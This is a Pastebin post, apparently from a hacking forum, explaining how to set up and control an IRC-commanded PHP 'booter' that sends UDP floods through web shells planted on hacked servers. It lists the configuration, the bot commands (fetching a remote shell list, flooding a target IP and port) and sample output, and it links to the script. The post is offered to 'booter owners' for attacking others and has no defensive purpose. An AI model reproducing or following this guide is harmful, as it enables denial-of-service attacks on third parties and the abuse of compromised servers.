Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- I am sharing it here as I know their are many booter owners so I know some people will find this useful.
- Requirements:
- (Hacked) Webserver/Server with php engine
- PHP functions which are not blocked:
- fsocketopen();
- file_get_contents();
- set_time_limit(0);
- Access to an IRC Server/channel (can be a public one)
- PHP DoS Shells
- My php script
- How to set it up:
- 1. Copy the script (at the end of this thread) and put it into an editor.
- 2. Configure the following things in your editor to your IRC Server:
- PHP Code:
- //Config
- $IRC_SERVER = "irc.server.com";
- $IRC_PORT = "6667";
- $IRC_NICK = "[BOOTER]";
- $IRC_CHANNEL = "#channel";
- $IRC_MASTERPASS = "password";
- 3. Save the file as shellbooter.php (can be named to anything you want)
- 4. Upload the file to your server
- 5. Run the script by visiting the website in your browser ( http://exampleserver.com/shellbooter.php ) -> The booter will join your IRC Server/Channel
- 6. Check your channel on your IRC Server for the booter.
- Setting up your list of shells:
- Put all your shells into a .txt file like this:
- Code:
- http://server1.com/shell.php
- http://server2.net/x32.php
- http://www.server3.info/somefolder/maybe/shell.php
- and upload it somewhere, where you can directly access it.
- For example with dropbox.
- How to control it:
- You can control the booter with the following commands:
- Code:
- !join <channel> -> Join Channel
- !part <channel> -> Leave Channel
- !kill <Masterpass> -> Kills the bot
- !getlist <URL> -> Gets the list of shells
- !flood <IP> <Port> <Time (sec)> -> Flood
- First you need to let your booter know about your shells. You do that like this:
- Code:
- !getlist http://someserver/directlike/to/shells.txt
- The booter will reply with:
- Code:
- [SHELLS] - Amount of shells: XX
- Then you can let it boot. You do that like this (example):
- Code:
- !flood 123.123.123.123 80 20
- The booter will reply with:
- Code:
- [UDP Flood] - Host: 123.123.123.123 | Port: 80 | Time: 20 | Sending to shells...
- That's all. Your IRC Booter will send the request to your shells.
- Feel free to mod the script or whatever you want to do with it:)
- PHP Script: http://www.mediafire.com/?o1q3hcrfobvutp0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement